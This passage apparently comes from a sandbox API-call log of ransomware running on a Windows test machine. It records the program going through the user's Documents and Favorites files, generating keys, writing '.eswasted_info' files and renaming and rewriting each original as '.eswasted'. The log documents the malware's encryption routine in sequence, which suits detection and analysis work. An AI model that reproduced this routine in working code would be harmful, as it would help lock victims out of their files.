(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RJYwxxDNS.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rjywxxdns.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.956] WriteFile (in: hFile=0xf8, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0076.957] SetEndOfFile (hFile=0xf8) returned 1 [0076.957] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.957] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.957] lstrcpyW (in: lpString1=0x4e13dc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RJYwxxDNS.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rjywxxdns.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RJYwxxDNS.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rjywxxdns.pptx.eswasted")) returned 1 [0076.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RJYwxxDNS.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rjywxxdns.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.958] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0076.960] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0076.961] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0076.961] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.961] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0076.961] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0076.961] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.379] SetEndOfFile (hFile=0xf8) returned 1 [0077.382] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0077.382] CloseHandle (hObject=0xf8) returned 1 [0077.383] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0077.383] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0077.384] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0077.384] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tvnOG.pptx") returned 54 [0077.384] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x276) returned 0x4e1368 [0077.384] lstrcpyW (in: lpString1=0x4e13d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.384] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.384] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0077.385] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.385] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tvnOG.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tvnog.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.386] WriteFile (in: hFile=0xf8, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.387] SetEndOfFile (hFile=0xf8) returned 1 [0077.387] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.387] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.387] lstrcpyW (in: lpString1=0x4e13d4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tvnOG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tvnog.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tvnOG.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tvnog.pptx.eswasted")) returned 1 [0077.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tvnOG.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tvnog.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0077.388] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0077.393] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0077.394] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.394] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.394] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0077.394] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0077.395] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.403] SetEndOfFile (hFile=0xf8) returned 1 [0077.407] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.407] CloseHandle (hObject=0xf8) returned 1 [0077.409] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0077.409] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0077.410] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0077.410] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uztv.docx") returned 53 [0077.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4e1368 [0077.410] lstrcpyW (in: lpString1=0x4e13d2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.410] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0077.410] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.410] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uztv.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uztv.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.411] WriteFile (in: hFile=0xf8, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.412] SetEndOfFile (hFile=0xf8) returned 1 [0077.412] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.412] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.412] lstrcpyW (in: lpString1=0x4e13d2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uztv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uztv.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uztv.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uztv.docx.eswasted")) returned 1 [0077.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uztv.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uztv.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.413] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0077.416] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0077.417] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0077.417] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.417] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0077.418] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0077.418] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.547] SetEndOfFile (hFile=0xf8) returned 1 [0077.731] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0077.731] CloseHandle (hObject=0xf8) returned 1 [0077.732] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0077.733] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0077.733] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0077.733] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zgyp4uTe.pdf") returned 56 [0077.733] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4e1368 [0077.733] lstrcpyW (in: lpString1=0x4e13d8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.733] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.733] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0077.734] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.734] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zgyp4uTe.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zgyp4ute.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.738] WriteFile (in: hFile=0xf8, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.739] SetEndOfFile (hFile=0xf8) returned 1 [0077.739] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.739] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.739] lstrcpyW (in: lpString1=0x4e13d8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zgyp4uTe.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zgyp4ute.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zgyp4uTe.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zgyp4ute.pdf.eswasted")) returned 1 [0077.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zgyp4uTe.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zgyp4ute.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0077.740] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.742] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0077.743] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0077.743] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.743] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0077.744] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0077.744] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.753] SetEndOfFile (hFile=0xf8) returned 1 [0077.755] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.755] CloseHandle (hObject=0xf8) returned 1 [0077.756] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0077.756] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0077.757] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0077.757] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.757] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0077.757] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x294) returned 0x4e1368 [0077.757] lstrcpyW (in: lpString1=0x4e13f2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0077.757] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0077.757] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0077.758] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0077.758] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0077.758] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.860] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0077.861] SetEndOfFile (hFile=0x110) returned 1 [0077.861] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.861] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0077.861] lstrcpyW (in: lpString1=0x4e13f2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0077.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted")) returned 1 [0078.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0078.023] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0078.023] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0078.024] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0078.024] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.024] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0078.025] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0078.025] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.034] SetEndOfFile (hFile=0x110) returned 1 [0078.036] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0078.036] CloseHandle (hObject=0x110) returned 1 [0078.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0078.038] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0078.039] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0078.039] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.039] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0078.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b2) returned 0x4e1368 [0078.039] lstrcpyW (in: lpString1=0x4e1410, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0078.039] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0078.039] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ebff0 | out: pbBuffer=0x4ebff0) returned 1 [0078.040] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0078.040] WriteFile (in: hFile=0x110, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0078.041] SetEndOfFile (hFile=0x110) returned 1 [0078.041] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.041] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0078.041] lstrcpyW (in: lpString1=0x4e1410, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted")) returned 1 [0078.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.042] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0078.043] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0078.069] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0078.069] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.069] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0078.070] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0078.070] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.078] SetEndOfFile (hFile=0x110) returned 1 [0078.080] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0078.080] CloseHandle (hObject=0x110) returned 1 [0078.083] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1368 | out: hHeap=0x4a0000) returned 1 [0078.083] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0078.084] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0078.084] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0078.084] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0078.084] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b2) returned 0x4e1368 [0078.084] lstrcpyW (in: lpString1=0x4e1410, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.084] RtlAllocateHeap 